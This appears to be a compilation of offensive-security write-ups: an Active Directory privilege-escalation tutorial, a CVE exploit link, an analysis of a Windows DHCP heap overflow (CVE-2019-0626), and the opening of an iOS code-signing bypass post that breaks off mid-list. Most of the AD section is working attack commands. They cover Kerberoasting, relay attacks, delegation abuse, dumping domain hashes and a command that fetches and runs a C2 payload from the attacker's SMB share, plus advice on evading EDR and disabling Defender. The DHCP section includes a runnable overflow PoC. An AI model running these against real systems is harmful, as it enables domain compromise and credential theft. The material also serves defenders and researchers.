With a target list and a domain controller identified, one way of escalating privileges is Kerberoasting. Kerberoasting is possible because service accounts are issued a Service Principal Name (SPN) within AD. Any user can then request a Kerberos service ticket for that SPN, and the ticket is encrypted with a key derived from that account's password (in Kerberos 5 TGS-REP format), so it can be cracked offline. There are many different tools that can do Kerberoasting, but really you only need one. GetUserSPNs.py is pretty self-explanatory: it queries the target domain for SPNs that are running under a user account. Using it is pretty simple. And now we have the hash of a service account. I load it into hashcat (GUI, of course), select hash type 13100, as highlighted below, and it cracks within a few seconds. We now have the credentials to a service account, which usually results in access to the domain controller. Too easy? Let's try other ways.
Attack: ASREPRoasting | Tool: Rubeus
ASREPRoasting is similar to Kerberoasting in the sense that we request tickets for accounts, get the hash, then crack it; however, in the case of ASREPRoasting there's a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting.
When you request a TGT via a Kerberos AS-REQ message, you also supply a timestamp encrypted with a key derived from your password. The Key Distribution Center (KDC) decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker: we aren't the KDC and cannot decrypt that message. Of course, this is by design, to prevent offline guessing attacks. However, if pre-authentication is turned off, we can send an AS-REQ for any user and get back material encrypted with their password-derived key, which we can then crack. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, but still worth mentioning. tsmith is susceptible to ASREPRoasting because 'Do not require Kerberos preauthentication' is checked. To exploit this, we'll use a tool called Rubeus. Rubeus is a massive toolset for abusing Kerberos, but for conducting ASREPRoasting, we care about this section. To use Rubeus, you first need to install Visual Studio. Once installed, download Rubeus and open the Rubeus.sln file with Visual Studio. By default, it will build into the Rubeus\bin\Debug\ directory. cd into that directory, then run it:

.\Rubeus.exe asreproast

If no users have 'Do not require Kerberos preauthentication' checked, then there won't be any users to roast. But if there is… We can then get the hash for the user and crack it. Keep in mind that the examples were done on a computer already joined to the domain, so if you were doing this from a computer not on the domain, you would have to pass in the domain controller, domain name, OUs, etc.
Tool: SILENTTRINITY
SILENTTRINITY is a new Command and Control (C2) tool developed by @byt3bl33d3r which utilizes IronPython and C#.
You have the option to use MSBuild.exe, a Windows binary which builds C# code (installed by default with Windows 10 as part of .NET), to run a command & control (C2) payload supplied as an XML project file, allowing the attacker to then use the underlying .NET framework to do as they please on the victim's machine via IronPython, C#, and other languages. Personally, SILENTTRINITY has replaced Empire in my toolkit, and I wrote a guide on how to use it here. There are still select areas where I'd prefer to have an Empire connection, but ST is also in an 'alpha' state, so that functionality will come. There are three main reasons why ST has replaced Empire, in my opinion:
1. Empire payloads are now being caught by Windows Defender, even when obfuscated (there are ways around it, but still).
2. ST lives off the land.
3. You can elevate to SYSTEM privileges when executing the payload over CME with the --exec-method atexec switch.
Below is a PoC in a fresh Windows 10 install, using a non-Domain Admin user's credentials. Account "tsmith" is only in the Users group. Code execution with tsmith's credentials: I generate the XML payload in SILENTTRINITY, then host it on my SMB server via smbserver.py. If you're confused on how to do that, follow my guide here. I then use CME to execute the command that will fetch the XML file from my attacker machine:

crackmapexec 192.168.218.60 -u tsmith -p Password! -d lab.local -x 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.218.129\SMB\msbuild.xml' --exec-method atexec

CME executes the supplied command, which runs msbuild.exe and tells it to build the XML file hosted on my SMB server. I now have a session opened in ST, and listing the info for the session reveals my username is SYSTEM, meaning I escalated from user tsmith to SYSTEM. This is because the --exec-method atexec option runs the command via Task Scheduler with SYSTEM privileges (or the highest privileges available).
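The XML payload itself leans on MSBuild's inline-task feature: msbuild.exe will compile and execute C# embedded in a project file. SILENTTRINITY generates its own payload XML, but the underlying mechanism looks roughly like this skeleton (the class name and message here are placeholders, not ST's actual stager):

```xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <InlinePayload />
  </Target>
  <UsingTask TaskName="InlinePayload" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Utilities;

          // Placeholder payload class; a real stager would load and
          // execute its second stage here instead of printing.
          public class InlinePayload : Task
          {
              public override bool Execute()
              {
                  Console.WriteLine("Hello from an MSBuild inline task");
                  return true;
              }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```

Hosting a file like this on an SMB share and pointing msbuild.exe at it, as in the CME command above, is what makes the execution "live off the land": the compiler doing the work is a signed Microsoft binary.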
And of course, we then dump credentials and now have an administrator password hash, which we can pass or crack.
Attack: PrivExchange
PrivExchange is a new technique (within the past month) that takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirk-jan a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server and getting it to authenticate back to you; that authentication is relayed to the Domain Controller via ntlmrelayx, which then modifies a user's privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py, point it at a DC, authenticate via LDAP, and escalate privileges for a user:

ntlmrelayx.py -t ldap://192.168.218.10 --escalate-user rsmith

Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain:

python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter2017

privexchange.py makes the API call to the Exchange server; ntlmrelayx relays the Exchange server's credentials to the DC, then escalates rsmith's privileges. Using rsmith's privileges, we dump the hashes on the DC. With the hashes of all users, they can now be cracked. Side note: if you ever run Mimikatz and it gets caught by AV, secretsdump.py is an excellent alternative, as it doesn't drop anything to disk.
Attack: Kerberos Unconstrained Delegation
Also from Dirk-jan comes an attack that takes advantage of default AD installs.
Specifically, it abuses the fact that computer accounts can, by default, have delegation-related attributes such as msDS-AllowedToActOnBehalfOfOtherIdentity modified. This attribute controls which accounts can impersonate users to that computer via Kerberos, which in practice means logging in to it as (almost) any user on the domain. This is all made possible by relaying credentials. I demonstrated mitm6 in part one, so I'll use it again here, but relay the responses in a different way:

mitm6 -i ens33 -d lab.local

I then serve the WPAD file and relay the credentials over LDAPS to the primary DC while choosing the delegate-access attack method:

ntlmrelayx.py -t ldaps://LAB2012DC01.lab.local -wh 192.168.10.100 --delegate-access

The victim opens IE, which sends out a WPAD request over IPv6, which the attacker (me) responds to, relaying those credentials to the DC over LDAPS. A new computer account is created, and the delegation rights are modified so that the new 'computer' can impersonate any user on LABWIN10 (the victim) via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. So I now generate a silver ticket and impersonate the user 'Administrator':

getST.py -spn cifs/LABWIN10.lab.local lab.local/AFWMZ0DS\$ -dc-ip 192.168.10.10 -impersonate Administrator

I then log on to LABWIN10 with my silver ticket via secretsdump.py and dump the credentials. To read more on silver ticket attacks and how they work, this is a good article.
Attack: Resource-Based Constrained Delegation
Yes, more attacks due to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. @harmj0y made a post a few weeks ago on this. Essentially, if you're able to modify a computer object in AD, you can take over the computer itself. The only catch is that there needs to be at least one 2012+ domain controller, as older versions do not support resource-based constrained delegation (RBCD). Elad Shamir breaks the entire attack down, including more about RBCD, in this article.
There’s three tools used for this: Powermad Powerview Rubeus This attack is then conducted on the Windows 10 machine with rsmith’s credentials. First, we set the executionpolicy to bypass so we can import and run scripts. Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser Then we check to see if we can modify discretionary access control lists (DACLs). $AttackerSID = Get-DomainGroup Users -Properties objectsid | Select -Expand objectsid Get-DomainObjectACL LAB2012DC01.lab.local | ?{$_.SecurityIdentifier -match $AttackerSID} The above commands look up rights for the ‘Users’ SID, showing that the group has ‘Generate Write’ permissions on the object (the DC). By default, this isn’t exploitable. This is abusing a potential misconfiguration an Administrator made; in this example it is the fact that the Admin added the “Users” group as a principal to the DC and allowed the GenericWrite attribute. As a PoC, rsmith (who is in the “Users” group), cannot get into the DC. What we do next is create a new computer account and modify the property on the domain controller to allow the new computer account to pretend to be anyone to the domain controller, all thanks to the msDS-allowedToActOnBehalfOfOtherIdentity. It’s possible for us to create a new computer account, because by default a user is allowed to create up to 10 machine accounts. Powermad has a function for it New-MachineAccount -MachineAccount hackermachine -Password $(ConvertTo-SecureString 'Spring2017' -AsPlainText -Force) We then add the new machine’s SID to the msDS-allowedToActOnBehalfOfOtherIdentity attribute on the DC. 
$ComputerSid = Get-DomainComputer hackermachine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Then we use Rubeus to get the NT hash for our created machine account:

.\Rubeus.exe hash /password:Spring2017 /user:hackermachine /domain:lab.local

Finally, we impersonate a domain administrator (Administrator) using Rubeus' service-for-user (S4U) functionality against the target DC:

.\Rubeus.exe s4u /user:hackermachine$ /rc4:9EFAFD86A2791ED001085B4F878AF381 /impersonateuser:Administrator /msdsspn:cifs/LAB2012DC01.lab.local /ptt

With the ticket imported, we can then access the domain controller. Again, this leverages the fact that the system administrator dun goofed and gave the 'Users' group GenericWrite access to the DC: even though we couldn't access it via SMB, we could modify the permissions that then let us in. If you're still confused, here's a video from SpecterOps demonstrating a walkthrough.
Attack: MS14-025, GPP
This one is less common as it's been out for quite some time, but it gets a mention because it still exists. MS14-025 is also known as the Group Policy Preferences escalation vulnerability. When a Domain Administrator pushed out a local administrator account via Group Policy Preferences, the encrypted credentials were stored in the SYSVOL share on the domain controller (SYSVOL is readable by any authenticated user, as it's where policies and other things domain clients need are stored). This typically wouldn't be a problem because the password is AES encrypted, right? Well, Microsoft dun goofed and published the decryption key, so attackers can decrypt the password. To simplify things, Metasploit has an auxiliary module for this.
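For reference, the reason the Metasploit module (and tools like gpp-decrypt) work at all is that the AES-256 key is static and public. A stdlib-only sketch of the decoding stage is below; the final AES-256-CBC decrypt (with a 16-byte zero IV) needs a crypto library such as pycryptodome and is omitted here, and the key bytes are the ones Microsoft published in the MS-GPPREF documentation:

```python
import base64

# AES-256 key published by Microsoft in the MS-GPPREF documentation
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)

def decode_cpassword(cpassword):
    """Re-pad and base64-decode a GPP cpassword attribute value.

    cpassword strings are stored with their base64 '=' padding stripped,
    so it must be restored first. Returns the raw AES-256-CBC ciphertext;
    decrypting it with GPP_AES_KEY and a zero IV yields the plaintext
    password (requires an AES implementation, e.g. pycryptodome).
    """
    cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
    return base64.b64decode(cpassword)
```

The design point worth noticing is that the "secret" protecting every GPP-deployed password is the same constant on every domain, which is why the fix was to remove the feature rather than rotate a key.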
Attack: Finding overprivileged accounts | Tool: CrackMapExec
OK, this one isn't necessarily an "attack" so much as a methodology of doing good reconnaissance and enumeration, which a few tools can help with. It might seem like a stretch from an article standpoint, but overprivileged accounts are so incredibly common that it's not unusual to take one person's account, log into another person's workstation, and have read access to their files. On top of that, such accounts often have privileges on servers the user has no business accessing, which of course leads to the attacker dumping credentials everywhere until they find creds that work on the domain controller. The methodology here is pretty easy: spray the credentials across the network and see what you can log into. With CrackMapExec, you can list the shares and see what you have write access to:

crackmapexec 192.168.218.0/24 -u rsmith -p Winter2017 --shares

From here, use SILENTTRINITY to open a session on whatever the user has write access to, run the Mimikatz module, and hope you find new credentials that are privileged. Remember, you can use CME with CIDRs, meaning if you're using SILENTTRINITY as your C2 server and using CME to trigger the connection, you can spray that across the network for maximum sessions. It's not very OpSec friendly and quite noisy, though; consider it a test of the target's detection and response posture.
Tools: PowerTools Suite
Attack 1: Finding passwords in files
Another thing to look for is passwords in files. There have been several occasions where I find a user storing emails in their Documents folder that contain a password, or keeping an Excel/Word file with passwords in it. This is where the PowerSploit suite comes in handy. Where do I begin with the PowerSploit suite… basically, if you want to do something malicious, there's a PowerShell module for it.
In the case of searching for passwords, or any string for that matter, PowerView is your friend. Keep in mind EDRs catch basically every module in this suite, so I suggest obfuscating them before use via Invoke-Obfuscation. PowerView is easy to use. Download the PowerSploit suite and open PowerShell in the directory you've extracted it to (make sure you're admin). First, allow scripts to be run:

Set-ExecutionPolicy Bypass

Then import the module:

Import-Module .\PowerView.ps1

In the PowerView module is a command called Invoke-FileFinder, which allows you to search for files, or within files, for any string you want. Consider the string 'password'. Search the C drive for anything containing the string 'password'… Found a secret password file! Just be mindful that this takes a very long time; it helps to narrow the search area down and run the command from that directory.
Attack 2: Get-ExploitableSystem
This is a pretty self-explanatory script. It queries Active Directory for the hostname, OS version, and service pack level of each computer account, then cross-references that against a list of common Metasploit exploits. First, import the whole PowerSploit suite (or just PowerView if you want):

Import-Module .\PowerSploit.psd1

Then run the command:

Get-ExploitableSystem -Verbose

Hurray for Windows XP!
Attack 3: PowerUp
In the PowerUp module is a function called Invoke-AllChecks, which does exactly what it says: it checks for everything, from unquoted service paths (which I wrote on how to exploit here) to MS14-025. Look at the GitHub page for more info. Using it is simple:

Invoke-AllChecks

Thanks, MSI.
Attack 4: GetSystem
This module does the same thing the Metasploit 'getsystem' function does. To find out more about what exactly that entails, read this excellent post by CobaltStrike. Otherwise, just run the command:

Get-System -Technique Token
or
Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'

I am just a lonely Admin. I am SYSTEM!
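If the PowerSploit modules are getting flagged, the password-hunting idea from Attack 1 takes only a few lines of stdlib Python. This is a crude stand-in for Invoke-FileFinder, not a replacement: it matches on file names and raw bytes, so it won't see inside zipped formats like .docx:

```python
import os

def find_string_in_files(root, needle="password",
                         exts=(".txt", ".ini", ".config", ".xml", ".eml")):
    """Walk a directory tree, returning files whose name or raw contents
    contain the needle (case-insensitive). Crude on purpose: reads whole
    files, skips unreadable ones, and only greps inside plain-text
    extensions."""
    needle = needle.lower()
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if needle in name.lower():
                hits.append(path)          # filename match (any extension)
                continue
            if os.path.splitext(name)[1].lower() not in exts:
                continue
            try:
                with open(path, "rb") as f:
                    if needle.encode() in f.read().lower():
                        hits.append(path)  # content match
            except OSError:
                pass
    return hits
```

Like Invoke-FileFinder, narrowing the root directory down is the difference between seconds and hours on a big file server.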
Tool(s): ADAPE
Personally, I wrote one called ADAPE, the Active Directory Assessment and Privilege Escalation script. ADAPE is written in PowerShell and runs several other tools' functions automatically, preventing the need to port over multiple tools. It's also obfuscated and turns off Windows Defender to help bypass EDR. ADAPE is meant to be easy to use: download it, port it over to your target Windows machine, and run it:

PowerShell.exe -ExecutionPolicy Bypass ./ADAPE.ps1

Since all the necessary scripts are included, it doesn't need to reach out to the internet, and it will store the results in a capture.zip file that can be exported. Error messages are normal, unless it breaks. Then report. Looking for GPP passwords, Kerberoasting, and running the Bloodhound ingestor… Checking for privesc, then deleting the files it made and zipping up the capture file. If you open the capture file, you'll have all the results. Again, this is by no means comprehensive; these are just a few tools and attacks I've used successfully over the years, so there's a good chance at least one of them works. In part III, I will go over post-exploitation and persistence.
Resources and References:
I take no credit for the discovery of any of these techniques; I'm just the dude that makes articles about the ones I like to use. Massive thank you to @harmj0y, @cptjesus, @_wald0, and the rest of the team at SpecterOps for the amazing research they do, as well as the creation of several excellent tools. Thank you to the Bloodhound Slack for answering my questions. Thank you @byt3bl33d3r and the team at Black Hills InfoSec for the research and tools they make. Thank you @_dirkjan and the team at Fox-IT for the research and tools. Thank you SecureAuth for impacket, a staple in every pentester's toolkit.
Sursa: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
  11. CVE-2018-8639-exp Platform: Windows 2008 and Windows 2008 R2 Sursa: https://github.com/ze0r/CVE-2018-8639-exp/
  12. Analyzing a Windows DHCP Server Bug (CVE-2019-0626) By: MalwareTech March 1, 2019 Category: Vulnerability Research Tags: patch analysis, reverse engineering
Today I'll be doing an in-depth write-up on CVE-2019-0626 and how to find it. Because this bug only exists on Windows Server, I'll be using a Server 2016 VM (the corresponding patch is KB4487026).
Binary Comparison
I ran a BinDiff comparison between the pre- and post-patch versions of dhcpssvc.dll. Below, we can see that only 4 functions have changed (similarity < 1.0). BinDiff comparison of dhcpssvc.dll before and after installing the patch. The first function I decided to look at was "UncodeOption". My reasoning was that it sounds like some kind of decoder, which is a common location for bugs. Double-clicking the target function brings up two side-by-side flow graphs: the original function on the left, and the updated one on the right. Each graph splits the function into logical blocks of assembly code, similar to IDA's "graph view". Green blocks are identical across both functions. Yellow blocks have some instruction variation between functions. Grey blocks contain newly added code. Red blocks contain removed code. A side-by-side comparison of function control flow. According to BinDiff, a fair few blocks have been modified. Most interestingly, there are two loops, each of which now has a new block of code. Additional blocks can be if statements containing extra sanity checks; this looks like a good place to start. Whilst it's possible to do more analysis in BinDiff, I find the interface too clunky. I think I already have all the information I need, so it's time to dive into IDA.
Code Analysis
If you have the full version of IDA, you can use the decompiler to save you digging through assembly code. Most bugs will be visible at a high level, though in rare cases you may need to compare code at the assembly level.
Due to the way IDA's decompiler works, you may find there are duplicate variables. For example, "v8" is a copy of "a2", but neither value is ever modified. We can clean up the code by right-clicking "v8" and selecting "map to another variable". By mapping "v8" to "a2", all instances of "v8" will be replaced by "a2". Remapping all unnecessary duplicate variables makes things easier to read. Here is a side-by-side comparison of the code after cleanup. A side-by-side comparison of patched and unpatched functions. The type of the second loop (yellow box) is now "do while" instead of "for", which matches the first loop (the loop format change could explain a lot of the yellow blocks in BinDiff). Most importantly, a completely new sanity check has been added (red box). The code in the blue box has also been simplified, with some of it moved inside the loop. My next step was to figure out what the "UncodeOption" function actually does. Right-clicking a function and selecting "jump to xref…" returns a list of every reference. A list of references to UncodeOption. Hmm… all of the calls to "UncodeOption" come from "ParseVendorSpecific" or "ParseVendorSpecificContent". This led me to google "DHCP Vendor Specific". Google's autocompletion filled in some blanks here: I now know that DHCP has something called "vendor specific options". A function named "UncodeOption" being called by "ParseVendorSpecific"? Kinda implies decoding of a vendor specific option. So, what's a vendor specific option?
Vendor Specific Options
The first result when googling "DHCP Vendor Specific Options" is a blog post which told me everything I needed to know [1]. Very helpfully, the blog post explains the packet format of the vendor specific options. The format is simple: a 1-byte option code, followed by a 1-byte length specifier, followed by the option value. Now we just need to send a test packet. I found a useful DHCP test client on a random blog [2]. Here is an example command.
dhcptest.exe --query --option "Vendor Specific Information"[str]="hello world"

This sets the vendor specific option to "hello world". Now we can see if "UncodeOption" gets called.
Runtime Analysis
In an attempt to cut corners, I set a breakpoint on "UncodeOption", sent my DHCP request, and hoped for the best. IDA Pro Memory View. Awesome! The breakpoint was hit. The parameters are easy to understand too: RCX (argument 1) points to the start of the vendor specific option; RDX (argument 2) points to the end of the vendor specific option; R8 is 0x2B (the option code for vendor specific options). Now I'm going to revisit the decompiled code and add some descriptive names; I also guessed some variable types. Knowing the format of the vendor specific options helps a lot. The un-patched code after some renaming. The addition of descriptive names and my new-found knowledge of vendor specific options made understanding the code much easier. I'll break it down. There are two loops (starting on line 25 and line 44).
First Loop
1. Gets the option code (1st byte of the option buffer).
2. Verifies the option code matches the value sent in R8 (0x2B).
3. Gets the option size (2nd byte of the option buffer), then adds it to a variable I've named required_size.
4. Increments buffer_ptr_1 to point to the end of the option.
5. Breaks if the new buffer_ptr_1 is larger than the end of the buffer (buffer_end).
6. Ends the loop if "buffer_ptr_1 + option size + 2" is greater than buffer_end.
Essentially, the loop gets the length of the option value (in our case "hello world"). If multiple vendor specific options have been sent back to back, the loop calculates the total size of all values combined. The variable "required_size" is used to allocate heap space later on.
Second Loop
1. Gets the option code (1st byte of the option buffer).
2. Verifies the option code matches the value sent in R8 (0x2B).
3. Gets the option size (2nd byte of the option buffer).
4. Appends the option value (i.e. "hello world") to the heap buffer by copying <option_size> bytes.
5. Increments buffer_ptr_2 to point to the end of the option.
6. Ends the loop if the new buffer_ptr_2 is greater than buffer_end.
Code Purpose
The function implements a typical array parser. The first loop reads ahead to calculate the buffer size required to parse the array. The second loop then parses the array into a newly allocated buffer.
The Bug
After staring at the two loop implementations side by side, I noticed something. A side-by-side comparison (loop 1 is on the left, loop 2 is on the right). Both loops have a condition which causes them to exit if the buffer pointer reaches the end of the array (green box). Interestingly, loop 1 has an extra check (red box): it also aborts if the next element in the array is invalid (i.e. its size would cause the pointer to increment past the end of the array). The difference in logic means loop 1 checks the validity of the next element before processing it, whilst loop 2 copies the element first and only then exits due to buffer_ptr_2 being larger than buffer_end. Because loop 1 is responsible for calculating size, the allocated buffer only has room for the valid array elements; loop 2 will copy all the valid elements, plus a single invalid one, before exiting. So, what if we sent the following? Malicious Option Array. The size-calculation loop would parse the first option size (0x0B) successfully. Then the next option size is validated: because there are not 0xFF bytes following it, the element is seen as invalid and disregarded. The result is an allocation size of 0x0B (11 bytes). The copy loop would copy the first option value, "hello world". On the second iteration, the option size isn't validated, so the copy appends 255 (0xFF) bytes to the buffer.
A total of 266 bytes will be copied into the 11 bytes of heap space, overflowing it by 255 bytes. For the last element to be seen as invalid, there must be fewer than 255 bytes between the 2nd option length and the end of the buffer (achieved by putting the malicious array at the end of the DHCP packet). Something interesting to note: we can put any number of bytes after the last option length, as long as it's fewer than 255. So we can overflow the heap with up to 254 bytes of data we specify, or with up to 254 bytes of whatever sits after our packet in the heap. Essentially, it's possible to do both an out-of-bounds (OOB) read and an OOB write.
Proof of Concept
To verify the bug, I needed to craft a malicious DHCP packet. I began by sending a legitimate DHCP packet using dhcptest, which I captured with Wireshark. A DHCP packet displayed by Wireshark. Looks like the vendor specific options buffer is already at the end of the packet, nice! I simply extracted the hex to a Python script and made a simple PoC. Tip: you can right-click the "Bootstrap Protocol" node, then select "Copy", followed by "…As Escaped String".
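The loop mismatch is easy to sanity-check with a quick Python model before crafting the real packet. This is a simplification of the parser logic described above, not the actual dhcpssvc code:

```python
def calc_required_size(buf, code=0x2B):
    """Model of loop 1: counts only elements that fit entirely in buf."""
    size, i = 0, 0
    while i + 1 < len(buf):
        if buf[i] != code:
            break
        opt_len = buf[i + 1]
        # loop 1's extra sanity check: stop if this element overruns the buffer
        if i + 2 + opt_len > len(buf):
            break
        size += opt_len
        i += 2 + opt_len
    return size

def copy_options(buf, code=0x2B):
    """Model of loop 2: copies an element before noticing the overrun.
    (In the real code the oversized copy reads past the packet, an OOB
    read; Python slicing just truncates instead.)"""
    out, i = b"", 0
    while i + 1 < len(buf):
        if buf[i] != code:
            break
        opt_len = buf[i + 1]
        out += buf[i + 2 : i + 2 + opt_len]  # no validity check here
        i += 2 + opt_len
    return out

# One valid option, then a length byte of 0xFF with only 100 bytes behind it
evil = bytes([0x2B, 0x0B]) + b"hello world" + bytes([0x2B, 0xFF]) + b"A" * 100
alloc = calc_required_size(evil)   # 11: only the valid element is counted
copied = len(copy_options(evil))   # 111: valid element plus the invalid one
```

The model reproduces the mismatch: the allocation loop sizes the buffer for 11 bytes, while the copy loop writes 111, which in the real parser lands on the heap past the allocation.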
from socket import *
import struct

# Captured DHCP discover packet (Python 2 byte strings)
dhcp_request = (
    "\x01\x01\x06\x00\xd5\xa6\xa8\x0c\x00\x00\x80\x00\x00\x00\x00\x00"  # op, htype, hlen, hops, xid, secs, flags, ciaddr
    + "\x00" * 220                                                      # yiaddr/siaddr/giaddr/chaddr/sname/file (zeroed)
    + "\x63\x82\x53\x63"                                                # DHCP magic cookie
    + "\x35\x01\x01"                                                    # option 53 (message type): discover
    + "\x2b\x0b" + "hello world"                                        # option 43 (vendor specific), len 0x0B
    + "\xff"                                                            # end option
)

dhcp_request = dhcp_request[:-1]                 # remove end byte (0xFF)
dhcp_request += struct.pack('=B', 0x2B)          # vendor specific option code
dhcp_request += struct.pack('=B', 0xFF)          # vendor specific option size
dhcp_request += "A" * 254                        # 254 bytes of As
dhcp_request += struct.pack('=B', 0xFF)          # packet end byte

s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)     # DHCP is UDP
s.bind(('0.0.0.0', 0))
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)        # put socket in broadcast mode
s.sendto(dhcp_request, ('255.255.255.255', 67))  # broadcast DHCP packet on port 67

Next, I attached a debugger to the svchost process containing dhcpssvc.dll and set two breakpoints: one on HeapAlloc, and the other just after the copy loop. Now I send my malicious DHCP packet. HeapAlloc breakpoint hit. On the HeapAlloc breakpoint, you can see that the allocation size is 0x0B (enough space for just "hello world"). I wonder what happens when we click run again? Post-copy breakpoint hit. Whoops!
The parser copied “hello world” and 254 bytes of ‘A’s to a heap allocation of only 11 bytes in size. This is most definitely an overflow, but we shouldn’t expect a crash unless we overwrite something critical.

Exploitability Considerations

Heap overflows can often be leveraged to gain remote code execution (RCE); however, there are some hurdles to overcome first. Over the years Microsoft has gradually introduced new mitigations, reducing heap overflow exploitability. I’ll summarize some of the important mitigations, but you can find a fuller write-up on TechNet [3][4].

Windows Vista and Above

Most generic heap overflow attacks rely on forging heap metadata to gain arbitrary write or execute capabilities (primitives). Unfortunately, Windows Vista added encoding and verification of heap metadata. Metadata fields are now XORed with a key, massively complicating modification. Without the ability to forge heap metadata, attackers must focus on overwriting the heap data itself. It’s still possible to overwrite objects stored on the heap, such as a class instance; these can provide the same primitives as metadata forgery.

Windows 8 and Above

Allocations smaller than 16,368 bytes go on something called the Low Fragmentation Heap (LFH). Windows 8 adds LFH allocation randomization, which makes the allocation order far less predictable. Being unable to control where an object is allocated makes overwriting a game of chance; however, there’s still hope. If an object’s allocation is attacker controlled, one could allocate hundreds of copies, increasing the chance of a successful overwrite. Of course, you’d have to find such an object and it’d have to be exploitable.

Conclusion

I’ve not been able to spend as much time on this bug as I’d like, and am yet to find an RCE method for newer systems. So far I’ve noticed a couple of TCP interfaces which may allow for better heap control. Assuming something more interesting doesn’t appear, I may come back to this in the future. 
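In model form, the allocation/copy mismatch described above boils down to sizing the destination buffer from the first option-43 instance while copying the concatenation of every option-43 instance. The following is a toy sketch in Python, not the actual dhcpssvc.dll logic; the option codes and value lengths follow the packet built earlier:

```python
# Toy model of the overflow (NOT real DHCP-server code): the buffer is
# sized from the first vendor-specific (0x2B) option, but the copy loop
# appends the value of every 0x2B option it finds.
def parse_options(options):
    # options: list of (code, value) pairs as they appear in the packet
    vendor_chunks = [v for c, v in options if c == 0x2B]
    alloc_size = len(vendor_chunks[0])   # HeapAlloc(0x0B) for "hello world"
    copied = b"".join(vendor_chunks)     # copy loop concatenates every chunk
    overflow = len(copied) - alloc_size
    return alloc_size, len(copied), overflow

# option 53 (DHCP message type), then the two option-43 instances
opts = [(0x35, b"\x01"), (0x2B, b"hello world"), (0x2B, b"A" * 254)]
alloc, copied, overflow = parse_options(opts)
print(alloc, copied, overflow)  # 11 bytes allocated, 265 copied, 254 overflowed
```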
References

[1] Microsoft Vendor specific DHCP options explained and demystified – https://www.ingmarverheij.com/microsoft-vendor-specific-dhcp-options-explained-and-demystified/
[2] A custom tool for sending DHCP requests – https://blog.thecybershadow.net/2013/01/10/dhcp-test-client/
[3] TechNet blog post about early heap mitigations – https://blogs.technet.microsoft.com/srd/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities/
[4] TechNet blog post about Windows 8+ heap mitigations – https://blogs.technet.microsoft.com/srd/2013/10/29/software-defense-mitigating-heap-corruption-vulnerabilities/

Sursa: https://www.malwaretech.com/2019/03/analyzing-a-windows-dhcp-server-bug-cve-2019-0626.html
  13. 01 March 2019

Completely Bypassing Codesigning on Modern iOS
By Dynastic

iOS prevents the execution of unsigned binaries, and in iOS 12, CoreTrust enforces this even further, becoming a significant obstacle for jailbreaks. In this post, we will detail a practical attack against both AMFI and CoreTrust, utilising a time of check to time of use (TOCTOU) attack. This is a follow-up to our previous research post on CoreTrust, CoreTrust: an overview.

Heads up: This is developer-oriented research for those with advanced knowledge of programming, code signing techniques, attack vectors, security research, and jailbreak development. While we have attempted to thoroughly explain terms used, a background in jailbreaking is recommended.

Background

When a binary is spawned, iOS ensures that it has a valid code signature from Apple before it is executed. This is stored in the vnode of the binary, in a field called cs_blob. Among other things, the cs_blob stores a hash of the binary in a field called csb_cdhash. AppleMobileFileIntegrity (AMFI) is responsible for ensuring the validity of the signature and the entitlements.

Overview

Early on in the codesigning validation process, a function called _vnode_check_signature is invoked in AMFI; this is where the bulk of AMFI's logic lies, and is where all of AMFI's checks for a binary originate from. From here, the signature and entitlements are parsed. Any error that occurs here is fatal and prevents the binary from being launched. CoreTrust validation occurs here too (we recommend reading our previous post CoreTrust: an overview to understand more about what CoreTrust does). AMFI has a feature known as the TrustCache, which is simply a list of cd_hashes that are automatically trusted by AMFI. Xcode utilises this functionality to make Xcode's debugging features work, and modern jailbreaks use this to load their main payloads and run them with special privileges. 
Early in the _vnode_check_signature flow, the cd_hash of the vnode is checked against the list of hashes in the loadedTrustCaches.

The check in AMFI to see if a hash is in a loaded TrustCache.

This happens very early in the flow, before CoreTrust is called and before any other additional checks happen. Therefore, if the hash can be changed to a trusted hash whilst AMFI is evaluating it, but returned to normal after, then the codesigning flow can be completely bypassed.

The attack

Now that we know about the issue, we can work on attacking it. It is important to remember that the cd_hash of the binary must match the hash of the binary when dyld checks it, so the cd_hash of the binary must be swapped back before that happens. To achieve this, these steps have to be performed on the launch of any process:

1. Lookup the vnode of the binary, attaching a cs_blob to it. This can be achieved using the F_ADDSIGS fcntl call, which will automatically add a cs_blob to a given vnode.
